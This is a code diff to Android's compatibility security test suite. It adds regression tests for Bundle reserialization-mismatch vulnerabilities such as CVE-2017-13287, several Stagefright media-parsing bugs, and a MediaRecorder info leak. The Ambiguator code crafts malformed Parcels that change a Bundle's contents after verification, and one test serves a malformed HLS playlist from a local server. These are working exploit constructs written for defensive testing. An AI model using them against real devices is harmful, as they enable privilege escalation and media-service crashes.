+ parcel.writeInt(preReSerialize.size() + 1);
+ parcel.writeString(key);
+
+ parcel.writeInt(VAL_OBJECTARRAY);
+ parcel.writeInt(3);
+
+ parcel.writeInt(VAL_PARCELABLE);
+ parcel.writeString("com.android.internal.app.procstats.ProcessStats");
+
+ parcel.writeInt(PROCSTATS_MAGIC);
+ parcel.writeInt(PROCSTATS_PARCEL_VERSION);
+ parcel.writeInt(PROCSTATS_STATE_COUNT);
+ parcel.writeInt(PROCSTATS_ADJ_COUNT);
+ parcel.writeInt(PROCSTATS_PSS_COUNT);
+ parcel.writeInt(PROCSTATS_SYS_MEM_USAGE_COUNT);
+ parcel.writeInt(PROCSTATS_SPARSE_MAPPING_TABLE_ARRAY_SIZE);
+
+ parcel.writeLong(0);
+ parcel.writeLong(0);
+ parcel.writeLong(0);
+ parcel.writeLong(0);
+ parcel.writeLong(0);
+ parcel.writeString(null);
+ parcel.writeInt(0);
+ parcel.writeInt(0);
+
+ parcel.writeInt(0);
+ parcel.writeInt(0);
+ parcel.writeInt(1);
+ parcel.writeInt(1);
+ parcel.writeInt(0);
+
+ for (int i = 0; i < PROCSTATS_ADJ_COUNT; i++) {
+ parcel.writeInt(0);
+ }
+
+ parcel.writeInt(0);
+ parcel.writeInt(1);
+ parcel.writeInt(0);
+
+ parcel.writeInt(0);
+ parcel.writeInt(0);
+ parcel.writeInt(1);
+ parcel.writeInt(VAL_LONGARRAY);
+ parcel.writeString("AAAAA");
+ parcel.writeInt(0);
+
+ parcel.writeInt(VAL_INTEGER);
+ parcel.writeInt(0);
+ parcel.writeInt(VAL_BUNDLE);
+ parcel.writeBundle(postReSerialize);
+
+ writeBundleSkippingHeaders(parcel, preReSerialize);
+
+ parcel.setDataPosition(0);
+ Bundle bundle = new Bundle();
+ parcelledDataField.set(bundle, parcel);
+ return bundle;
+ }
+
+ @Override
+ protected String makeStringToInject(Bundle stuffToInject, Random random) {
+ return null;
+ }
+ };
+
+ testAmbiguator(ambiguator);
+ }
+
+ @SecurityTest
public void test_android_CVE_2017_13287() throws Exception {
+ Ambiguator ambiguator = new Ambiguator() {
+ @Override
+ public Bundle make(Bundle preReSerialize, Bundle postReSerialize) throws Exception {
+ Random random = new Random(1234);
+ int minHash = 0;
+ for (String s : preReSerialize.keySet()) {
+ minHash = Math.min(minHash, s.hashCode());
+ }
+ for (String s : postReSerialize.keySet()) {
+ minHash = Math.min(minHash, s.hashCode());
+ }
+
+ String key;
+ int keyHash;
+
+ do {
+ key = randomString(random);
+ keyHash = key.hashCode();
+ } while (keyHash >= minHash);
+
+ padBundle(postReSerialize, preReSerialize.size() + 1, minHash, random);
+ padBundle(preReSerialize, postReSerialize.size() - 1, minHash, random);
+
+ String key2;
+ int key2Hash;
+ do {
+ key2 = makeStringToInject(postReSerialize, random);
+ key2Hash = key2.hashCode();
+ } while (key2Hash >= minHash || key2Hash <= keyHash);
+
+
+ Parcel parcel = Parcel.obtain();
+
+ parcel.writeInt(preReSerialize.size() + 2);
+ parcel.writeString(key);
+
+ parcel.writeInt(VAL_PARCELABLE);
+ parcel.writeString("com.android.internal.widget.VerifyCredentialResponse");
+
+ parcel.writeInt(0);
+ parcel.writeInt(0);
+
+ parcel.writeString(key2);
+ parcel.writeInt(VAL_NULL);
+
+ writeBundleSkippingHeaders(parcel, preReSerialize);
+
+ parcel.setDataPosition(0);
+ Bundle bundle = new Bundle();
+ parcelledDataField.set(bundle, parcel);
+ return bundle;
+ }
+
+ @Override
+ protected String makeStringToInject(Bundle stuffToInject, Random random) {
+ Parcel p = Parcel.obtain();
+ p.writeInt(0);
+ p.writeInt(0);
+
+ Parcel p2 = Parcel.obtain();
+ stuffToInject.writeToParcel(p2, 0);
+ int p2Len = p2.dataPosition() - BUNDLE_SKIP;
+
+ for (int i = 0; i < p2Len / 4 + 4; i++) {
+ int paddingVal;
+ if (i > 3) {
+ paddingVal = i;
+ } else {
+ paddingVal = random.nextInt();
+ }
+ p.writeInt(paddingVal);
+
+ }
+
+ p.appendFrom(p2, BUNDLE_SKIP, p2Len);
+ p2.recycle();
+
+ while (p.dataPosition() % 8 != 0) p.writeInt(0);
+ for (int i = 0; i < 2; i++) {
+ p.writeInt(0);
+ }
+
+ int len = p.dataPosition() / 2 - 1;
+ p.writeInt(0); p.writeInt(0);
+ p.setDataPosition(0);
+ p.writeInt(len);
+ p.writeInt(len);
+ p.setDataPosition(0);
+ String result = p.readString();
+ p.recycle();
+ return result;
+ }
+ };
+
+ testAmbiguator(ambiguator);
+ }
+
+ private void testAmbiguator(Ambiguator ambiguator) {
Bundle bundle;
- {
- Bundle verifyMe = new Bundle();
- verifyMe.putString("cmd", "something_safe");
- Bundle useMe = new Bundle();
- useMe.putString("cmd", "replaced_thing");
- Ambiguator a = new Ambiguator() {
- @Override
- public Bundle make(Bundle preReSerialize, Bundle postReSerialize) throws Exception {
- Random random = new Random(1234);
- int minHash = 0;
- for (String s : preReSerialize.keySet()) {
- minHash = Math.min(minHash, s.hashCode());
- }
- for (String s : postReSerialize.keySet()) {
- minHash = Math.min(minHash, s.hashCode());
- }
+ Bundle verifyMe = new Bundle();
+ verifyMe.putString("cmd", "something_safe");
+ Bundle useMe = new Bundle();
+ useMe.putString("cmd", "replaced_thing");
- String key;
- int keyHash;
+ try {
+ bundle = ambiguator.make(verifyMe, useMe);
- do {
- key = randomString(random);
- keyHash = key.hashCode();
- } while (keyHash >= minHash);
+ bundle = reparcel(bundle);
+ String value1 = bundle.getString("cmd");
+ bundle = reparcel(bundle);
+ String value2 = bundle.getString("cmd");
- padBundle(postReSerialize, preReSerialize.size() + 1, minHash, random);
- padBundle(preReSerialize, postReSerialize.size() - 1, minHash, random);
-
- String key2;
- int key2Hash;
- do {
- key2 = makeStringToInject(postReSerialize, random);
- key2Hash = key2.hashCode();
- } while (key2Hash >= minHash || key2Hash <= keyHash);
-
-
- Parcel parcel = Parcel.obtain();
-
- parcel.writeInt(preReSerialize.size() + 2);
- parcel.writeString(key);
-
- parcel.writeInt(VAL_PARCELABLE);
- parcel.writeString("com.android.internal.widget.VerifyCredentialResponse");
-
- parcel.writeInt(0);
- parcel.writeInt(0);
-
- parcel.writeString(key2);
- parcel.writeInt(VAL_NULL);
-
- writeBundleSkippingHeaders(parcel, preReSerialize);
-
- parcel.setDataPosition(0);
- Bundle bundle = new Bundle();
- parcelledDataField.set(bundle, parcel);
- return bundle;
- }
-
- @Override
- protected String makeStringToInject(Bundle stuffToInject, Random random) {
- Parcel p = Parcel.obtain();
- p.writeInt(0);
- p.writeInt(0);
-
- Parcel p2 = Parcel.obtain();
- stuffToInject.writeToParcel(p2, 0);
- int p2Len = p2.dataPosition() - BUNDLE_SKIP;
-
- for (int i = 0; i < p2Len / 4 + 4; i++) {
- int paddingVal;
- if (i > 3) {
- paddingVal = i;
- } else {
- paddingVal = random.nextInt();
- }
- p.writeInt(paddingVal);
-
- }
-
- p.appendFrom(p2, BUNDLE_SKIP, p2Len);
- p2.recycle();
-
- while (p.dataPosition() % 8 != 0) p.writeInt(0);
- for (int i = 0; i < 2; i++) {
- p.writeInt(0);
- }
-
- int len = p.dataPosition() / 2 - 1;
- p.writeInt(0); p.writeInt(0);
- p.setDataPosition(0);
- p.writeInt(len);
- p.writeInt(len);
- p.setDataPosition(0);
- String result = p.readString();
- p.recycle();
- return result;
- }
- };
- bundle = a.make(verifyMe, useMe);
- }
-
- bundle = reparcel(bundle);
- String value1 = bundle.getString("cmd");
- bundle = reparcel(bundle);
- String value2 = bundle.getString("cmd");
-
- if (!value1.equals(value2)) {
- fail("String " + value1 + "!=" + value2 + " after reparceling.");
+ if (!value1.equals(value2)) {
+ fail("String " + value1 + "!=" + value2 + " after reparceling.");
+ }
+ } catch (Exception e) {
}
}
@@ -159,10 +262,23 @@
static abstract class Ambiguator {
- protected static final int VAL_PARCELABLE = 4;
protected static final int VAL_NULL = -1;
+ protected static final int VAL_INTEGER = 1;
+ protected static final int VAL_BUNDLE = 3;
+ protected static final int VAL_PARCELABLE = 4;
+ protected static final int VAL_OBJECTARRAY = 17;
+ protected static final int VAL_INTARRAY = 18;
+ protected static final int VAL_LONGARRAY = 19;
protected static final int BUNDLE_SKIP = 12;
+ protected static final int PROCSTATS_MAGIC = 0x50535454;
+ protected static final int PROCSTATS_PARCEL_VERSION = 21;
+ protected static final int PROCSTATS_STATE_COUNT = 14;
+ protected static final int PROCSTATS_ADJ_COUNT = 8;
+ protected static final int PROCSTATS_PSS_COUNT = 7;
+ protected static final int PROCSTATS_SYS_MEM_USAGE_COUNT = 16;
+ protected static final int PROCSTATS_SPARSE_MAPPING_TABLE_ARRAY_SIZE = 4096;
+
protected final Field parcelledDataField;
public Ambiguator() throws Exception {
diff --git a/tests/tests/security/src/android/security/cts/MediaRecorderInfoLeakTest.java b/tests/tests/security/src/android/security/cts/MediaRecorderInfoLeakTest.java
new file mode 100644
index 0000000..4252614
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/MediaRecorderInfoLeakTest.java
@@ -0,0 +1,58 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import android.media.MediaRecorder;
+import android.test.AndroidTestCase;
+
+@SecurityTest
+public class MediaRecorderInfoLeakTest extends AndroidTestCase {
+
+ /**
+ * b/27855172
+ */
+ @SecurityTest(minPatchLevel = "2016-06")
+ public void test_cve_2016_2499() throws Exception {
+ MediaRecorder mediaRecorder = null;
+ try {
+ for (int i = 0; i < 1000; i++) {
+ mediaRecorder = new MediaRecorder();
+ mediaRecorder.setAudioSource(MediaRecorder.AudioSource.DEFAULT);
+ mediaRecorder.setVideoSource(MediaRecorder.VideoSource.SURFACE);
+ mediaRecorder.setOutputFormat(MediaRecorder.OutputFormat.THREE_GPP);
+ mediaRecorder.setAudioEncoder(MediaRecorder.AudioEncoder.AAC);
+ mediaRecorder.setVideoEncoder(MediaRecorder.VideoEncoder.H263);
+ mediaRecorder.setVideoFrameRate(30);
+ mediaRecorder.setVideoSize(352, 288);
+ mediaRecorder.setOutputFile("/sdcard/record.output");
+ mediaRecorder.prepare();
+ int test = mediaRecorder.getMaxAmplitude();
+ mediaRecorder.release();
+ if(test != 0){
+ fail("MediaRecorderInfoLeakTest failed");
+ }
+ }
+ } catch (Exception e) {
+ fail("Media Recorder Exception" + e.getMessage());
+ } finally {
+ if (mediaRecorder != null){
+ mediaRecorder.release();
+ }
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/PackageSignatureTest.java b/tests/tests/security/src/android/security/cts/PackageSignatureTest.java
index 72aff71..556031b 100644
--- a/tests/tests/security/src/android/security/cts/PackageSignatureTest.java
+++ b/tests/tests/security/src/android/security/cts/PackageSignatureTest.java
@@ -113,7 +113,10 @@
// Test package to verify upgrades to privileged applications
"com.android.cts.priv.ctsshim",
- "com.android.cts.ctsshim"
+ "com.android.cts.ctsshim",
+
+ // Oom Catcher package to prevent tests from ooming device.
+ "com.android.cts.oomcatcher"
));
diff --git a/tests/tests/security/src/android/security/cts/StagefrightTest.java b/tests/tests/security/src/android/security/cts/StagefrightTest.java
index dfe55f5..90698ca 100755
--- a/tests/tests/security/src/android/security/cts/StagefrightTest.java
+++ b/tests/tests/security/src/android/security/cts/StagefrightTest.java
@@ -56,6 +56,10 @@
import java.net.URL;
import java.nio.ByteBuffer;
import java.io.FileOutputStream;
+import java.io.OutputStream;
+import java.io.InputStream;
+import java.net.Socket;
+import java.net.ServerSocket;
import java.io.File;
import java.util.ArrayList;
import java.util.HashMap;
@@ -547,14 +551,6 @@
}
@SecurityTest
- public void testStagefright_bug_63522067() throws Exception {
- doStagefrightTestRawBlob(R.raw.bug_63522067_1_hevc, "video/hevc", 320, 420);
- doStagefrightTestRawBlob(R.raw.bug_63522067_2_hevc, "video/hevc", 320, 420);
- doStagefrightTestRawBlob(R.raw.bug_63522067_3_hevc, "video/hevc", 320, 420);
- doStagefrightTestRawBlob(R.raw.bug_63522067_4_hevc, "video/hevc", 320, 420);
- }
-
- @SecurityTest
public void testStagefright_bug_25765591() throws Exception {
doStagefrightTest(R.raw.bug_25765591);
}
@@ -610,6 +606,11 @@
}
@SecurityTest
+ public void testStagefright_cve_2016_3756() throws Exception {
+ doStagefrightTest(R.raw.cve_2016_3756);
+ }
+
+ @SecurityTest
public void testStagefright_bug_36592202() throws Exception {
Resources resources = getInstrumentation().getContext().getResources();
AssetFileDescriptor fd = resources.openRawResourceFd(R.raw.bug_36592202);
@@ -827,6 +828,91 @@
***********************************************************/
@SecurityTest
+ public void testStagefright_bug_68342866() throws Exception {
+ Thread server = new Thread() {
+ @Override
+ public void run() {
+ try (ServerSocket serverSocket = new ServerSocket(8080);
+ Socket conn = serverSocket.accept()) {
+ OutputStream outputstream = conn.getOutputStream();
+ InputStream inputStream = conn.getInputStream();
+ byte input[] = new byte[65536];
+ inputStream.read(input, 0, 65536);
+ String inputStr = new String(input);
+ if (inputStr.contains("bug_68342866.m3u8")) {
+ byte http[] = ("HTTP/1.0 200 OK\r\nContent-Type: application/x-mpegURL\r\n\r\n")
+ .getBytes();
+ byte playlist[] = new byte[] { 0x23, 0x45, 0x58, 0x54,
+ 0x4D, 0x33, 0x55, 0x0A, 0x23, 0x45, 0x58, 0x54,
+ 0x2D, 0x58, 0x2D, 0x53, 0x54, 0x52, 0x45, 0x41,
+ 0x4D, 0x2D, 0x49, 0x4E, 0x46, 0x46, 0x43, 0x23,
+ 0x45, 0x3A, 0x54, 0x42, 0x00, 0x00, 0x00, 0x0A,
+ 0x00, 0x00, 0x00, 0x00, 0x00, (byte) 0xFF,
+ (byte) 0xFF, (byte) 0xFF, (byte) 0xFF,
+ (byte) 0xFF, (byte) 0xFF, 0x3F, 0x2C, 0x4E,
+ 0x46, 0x00, 0x00 };
+ outputstream.write(http);
+ outputstream.write(playlist);
+ }
+ } catch (IOException e) {
+ }
+ }
+ };
+ server.start();
+ String uri = "http://127.0.0.1:8080/bug_68342866.m3u8";
+ final MediaPlayerCrashListener mpcl = new MediaPlayerCrashListener();
+ LooperThread t = new LooperThread(new Runnable() {
+ @Override
+ public void run() {
+ MediaPlayer mp = new MediaPlayer();
+ mp.setOnErrorListener(mpcl);
+ mp.setOnPreparedListener(mpcl);
+ mp.setOnCompletionListener(mpcl);
+ Surface surface = getDummySurface();
+ mp.setSurface(surface);
+ AssetFileDescriptor fd = null;
+ try {
+ mp.setDataSource(uri);
+ mp.prepareAsync();
+ } catch (IOException e) {
+ Log.e(TAG, e.toString());
+ } finally {
+ closeQuietly(fd);
+ }
+ Looper.loop();
+ mp.release();
+ }
+ });
+ t.start();
+ assertFalse("Device *IS* vulnerable to BUG-68342866",
+ mpcl.waitForError() == MediaPlayer.MEDIA_ERROR_SERVER_DIED);
+ t.stopLooper();
+ t.join();
+ server.join();
+ }
+
+ @SecurityTest
+ public void testStagefright_bug_74114680() throws Exception {
+ doStagefrightTest(R.raw.bug_74114680_ts, (10 * 60 * 1000));
+ }
+
+ @SecurityTest
+ public void testStagefright_bug_70239507() throws Exception {
+ doStagefrightTestExtractorSeek(R.raw.bug_70239507,1311768465173141112L);
+ }
+
+ @SecurityTest
+ public void testBug_33250932() throws Exception {
+ int[] frameSizes = {65, 11, 102, 414};
+ doStagefrightTestRawBlob(R.raw.bug_33250932_avc, "video/avc", 640, 480, frameSizes);
+ }
+
+ @SecurityTest
+ public void testStagefright_bug_37430213() throws Exception {
+ doStagefrightTest(R.raw.bug_37430213);
+ }
+
+ @SecurityTest
public void testStagefright_bug_68664359() throws Exception {
doStagefrightTest(R.raw.bug_68664359, 60000);
}
@@ -934,6 +1020,21 @@
doStagefrightTest(R.raw.bug_65484460);
}
+ @SecurityTest
+ public void testStagefright_cve_2017_18155() throws Exception {
+ doStagefrightTest(R.raw.cve_2017_18155);
+ }
+
+ @SecurityTest
+ public void testStagefright_cve_2018_9423() throws Exception {
+ doStagefrightTest(R.raw.cve_2018_9423);
+ }
+
+ @SecurityTest
+ public void testStagefright_cve_2016_3879() throws Exception {
+ doStagefrightTest(R.raw.cve_2016_3879);
+ }
+
private void doStagefrightTest(final int rid) throws Exception {
doStagefrightTestMediaPlayer(rid);
doStagefrightTestMediaCodec(rid);
@@ -1781,4 +1882,68 @@
t.stopLooper();
t.join(); // wait for thread to exit so we're sure the player was released
}
+
+ private void doStagefrightTestExtractorSeek(final int rid, final long offset) throws Exception {
+ final MediaPlayerCrashListener mpcl = new MediaPlayerCrashListener();
+ LooperThread thr = new LooperThread(new Runnable() {
+ @Override
+ public void run() {
+ MediaPlayer mp = new MediaPlayer();
+ mp.setOnErrorListener(mpcl);
+ try {
+ AssetFileDescriptor fd = getInstrumentation().getContext().getResources()
+ .openRawResourceFd(R.raw.good);
+ mp.setDataSource(fd.getFileDescriptor(),
+ fd.getStartOffset(),
+ fd.getLength());
+ fd.close();
+ } catch (Exception e) {
+ fail("setDataSource of known-good file failed");
+ }
+ synchronized(mpcl) {
+ mpcl.notify();
+ }
+ Looper.loop();
+ mp.release();
+ }
+ });
+ thr.start();
+ synchronized(mpcl) {
+ mpcl.wait();
+ }
+ Resources resources = getInstrumentation().getContext().getResources();
+ MediaExtractor ex = new MediaExtractor();
+ AssetFileDescriptor fd = resources.openRawResourceFd(rid);
+ try {
+ ex.setDataSource(fd.getFileDescriptor(), fd.getStartOffset(), fd.getLength());
+ } catch (IOException e) {
+ } finally {
+ closeQuietly(fd);
+ }
+ int numtracks = ex.getTrackCount();
+ String rname = resources.getResourceEntryName(rid);
+ Log.i(TAG, "start mediaextractor test for: " + rname + ", which has " + numtracks + " tracks");
+ for (int t = 0; t < numtracks; t++) {
+ try {
+ ex.selectTrack(t);
+ } catch (IllegalArgumentException e) {
+ Log.w(TAG, "couldn't select track " + t);
+ }
+ ex.seekTo(0, MediaExtractor.SEEK_TO_CLOSEST_SYNC);
+ ex.advance();
+ ex.seekTo(offset, MediaExtractor.SEEK_TO_NEXT_SYNC);
+ try
+ {
+ ex.unselectTrack(t);
+ }
+ catch (Exception e) {
+ }
+ }
+ ex.release();
+ String cve = rname.replace("_", "-").toUpperCase();
+ assertFalse("Device *IS* vulnerable to " + cve,
+ mpcl.waitForError() == MediaPlayer.MEDIA_ERROR_SERVER_DIED);
+ thr.stopLooper();
+ thr.join();
+ }
}